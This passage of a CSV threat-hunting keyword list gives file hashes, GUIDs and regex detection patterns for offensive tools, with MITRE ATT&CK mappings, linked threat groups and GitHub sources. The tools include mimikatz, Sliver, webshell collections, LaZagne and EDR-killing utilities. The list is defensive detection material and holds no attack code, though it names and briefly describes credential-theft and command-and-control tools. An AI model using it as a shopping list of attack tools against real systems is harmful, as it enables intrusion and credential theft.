"*261f880e-4bee-428d-9f64-c29292002c19*",".{0,1000}261f880e\-4bee\-428d\-9f64\-c29292002c19.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege 
Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#GUIDproject","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","23467" "*2623810712c6c081acd999538b5d6a7d28e166bf5e515648d30e30f01ea38e1c*",".{0,1000}2623810712c6c081acd999538b5d6a7d28e166bf5e515648d30e30f01ea38e1c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23468" "*2626b0227e8a7c5451bbc27b3988db5214b47f004c5856d4fdadd31731010d2e*",".{0,1000}2626b0227e8a7c5451bbc27b3988db5214b47f004c5856d4fdadd31731010d2e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23469" "*2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b*",".{0,1000}2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","23470" 
"*26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326*",".{0,1000}26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23472" "*2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780*",".{0,1000}2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23473" "*2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780*",".{0,1000}2633f67803a9cdd6ba381d1ff7e334a1e0472dc86d6f81513e57003644e80780.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23474" "*263a97ae0cf8daefca89d894014060176d030af5b2e94cea2846af2e4c64c644*",".{0,1000}263a97ae0cf8daefca89d894014060176d030af5b2e94cea2846af2e4c64c644.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","23475" 
"*2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da*",".{0,1000}2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#filehash","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","23478" "*2661F29C-69F5-4010-9198-A418C061DD7C*",".{0,1000}2661F29C\-69F5\-4010\-9198\-A418C061DD7C.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#GUIDproject","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","23481" "*26654c4213cbaff5769618c96be371610ea48ff3f85e909786b9218063e95214*",".{0,1000}26654c4213cbaff5769618c96be371610ea48ff3f85e909786b9218063e95214.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23483" "*26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9*",".{0,1000}26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","23484" 
"*266b50dd481bfa762dde5f54c014cdfa3b6bb6d3d1e05a7a0c49a4fb81eceb3c*",".{0,1000}266b50dd481bfa762dde5f54c014cdfa3b6bb6d3d1e05a7a0c49a4fb81eceb3c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23485" "*266e26430006ea2f97fb62e9f9a070a64af7af9a4879a8f8ca3008c5434d3ce5*",".{0,1000}266e26430006ea2f97fb62e9f9a070a64af7af9a4879a8f8ca3008c5434d3ce5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23486" "*266fa73ded3a2a2dc421e5605dc2fa2bff53d999fe3adebc44ffa989c33061bf*",".{0,1000}266fa73ded3a2a2dc421e5605dc2fa2bff53d999fe3adebc44ffa989c33061bf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23487" "*2672d3407c4e05697db342691363db2953fe732c6d87dab56888c401acc7e964*",".{0,1000}2672d3407c4e05697db342691363db2953fe732c6d87dab56888c401acc7e964.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23488" 
"*26733ba4a4306ff57e50790349fca2d49135e8c915fdc608a5600e80b69e1a01*",".{0,1000}26733ba4a4306ff57e50790349fca2d49135e8c915fdc608a5600e80b69e1a01.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23489" "*2677e9423aa9c338fa85cc819fa88b20262f6838f7323da6513c80a0c9c05803*",".{0,1000}2677e9423aa9c338fa85cc819fa88b20262f6838f7323da6513c80a0c9c05803.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. 
Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","23491" "*2677ebb8de5a2911a2edf04e2740812d5e4f4d93ddf370685c4f4176963b675e*",".{0,1000}2677ebb8de5a2911a2edf04e2740812d5e4f4d93ddf370685c4f4176963b675e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23492" "*267c2cc1712018393f79e00ee869f86e8be7522569e18ec76ab2c8deb36ba9d1*",".{0,1000}267c2cc1712018393f79e00ee869f86e8be7522569e18ec76ab2c8deb36ba9d1.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","23493" "*268a67a9e978f95dc4ac09e9e0197ec58db072fd4a798c7c08faae35cfdcf4a6*",".{0,1000}268a67a9e978f95dc4ac09e9e0197ec58db072fd4a798c7c08faae35cfdcf4a6.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23497" 
"*268bd4cf2215cfb4153bc7431f22bcf7d4a7790f305c21327566e6758fe3eb5a*",".{0,1000}268bd4cf2215cfb4153bc7431f22bcf7d4a7790f305c21327566e6758fe3eb5a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23498" "*268cd1727a2d84acc991768b9d4d30adcef18dca75f357e56aa0bdc91f345fd7*",".{0,1000}268cd1727a2d84acc991768b9d4d30adcef18dca75f357e56aa0bdc91f345fd7.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","23499" "*26953f6a9ae961392ed1484e9c7ace1211f5f962*",".{0,1000}26953f6a9ae961392ed1484e9c7ace1211f5f962.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","23500" "*269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72*",".{0,1000}269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23502" "*269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e*",".{0,1000}269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","23503" "*26a1cdb5b3fd8d0aae6e80c75f2fc44584e602c808e22ceaa006d84e16da9d5a*",".{0,1000}26a1cdb5b3fd8d0aae6e80c75f2fc44584e602c808e22ceaa006d84e16da9d5a.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23504" "*26a4bf1b21bc16bd38c859e0d6becb178106843a914f5657d649f9d68e594eb9*",".{0,1000}26a4bf1b21bc16bd38c859e0d6becb178106843a914f5657d649f9d68e594eb9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23505" "*26a7ddb93dd3f6a9b53d864af66267cc0b675be9092863edfa43810eb2363ade*",".{0,1000}26a7ddb93dd3f6a9b53d864af66267cc0b675be9092863edfa43810eb2363ade.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset 
discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23506" "*26aa83adf9a90a1a5438f2b64a5dba4d0a776dc55c634f0e913c6a28f31b036b*",".{0,1000}26aa83adf9a90a1a5438f2b64a5dba4d0a776dc55c634f0e913c6a28f31b036b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23507" "*26af8449b5506e9413d8459329fbdf2b44977f4b6e293eb26e6daef2409e51cc*",".{0,1000}26af8449b5506e9413d8459329fbdf2b44977f4b6e293eb26e6daef2409e51cc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","23509" "*26af9c0734525448e4a8d56c9c7b05df0146497ec71101c33812f3f3503201eb*",".{0,1000}26af9c0734525448e4a8d56c9c7b05df0146497ec71101c33812f3f3503201eb.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23510" "*26b7d1e0b6ed36874a1b73d5077af3778eb5537b842eff21e3b1be359154151a*",".{0,1000}26b7d1e0b6ed36874a1b73d5077af3778eb5537b842eff21e3b1be359154151a.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23511" "*26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03*",".{0,1000}26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23515" "*26d349e65525178dd3b6d69332c479362ce9be10e6c311b178e07bc82c904d16*",".{0,1000}26d349e65525178dd3b6d69332c479362ce9be10e6c311b178e07bc82c904d16.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23518" "*26d5dadb8fec5f13b488f0532dbcf4d9cb4331ad1b7e7277ac9331fa39275528*",".{0,1000}26d5dadb8fec5f13b488f0532dbcf4d9cb4331ad1b7e7277ac9331fa39275528.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23522" "*26dac5422f343bdc37148b510dd98d08046266ff06c15119c1193a9d9a3d5a5b*",".{0,1000}26dac5422f343bdc37148b510dd98d08046266ff06c15119c1193a9d9a3d5a5b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests 
(cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23523" "*26db7b92f4cc5c522ef48c9d7b41b8d72dd9a02b692dff91ca6234ee9559a5a6*",".{0,1000}26db7b92f4cc5c522ef48c9d7b41b8d72dd9a02b692dff91ca6234ee9559a5a6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23524" "*26de444c20c30bd7d731ff5322fca24dc5f442f43daaa5d840edfcc594e17465*",".{0,1000}26de444c20c30bd7d731ff5322fca24dc5f442f43daaa5d840edfcc594e17465.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23525" "*26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86*",".{0,1000}26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","23526" "*26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310*",".{0,1000}26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23528" "*26e7da8d0f2d7f18d96a76bfe5bfd78035fb091f6ad0edb700566accfa5fb97c*",".{0,1000}26e7da8d0f2d7f18d96a76bfe5bfd78035fb091f6ad0edb700566accfa5fb97c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23529" "*26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1*",".{0,1000}26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23530" "*26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850*",".{0,1000}26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
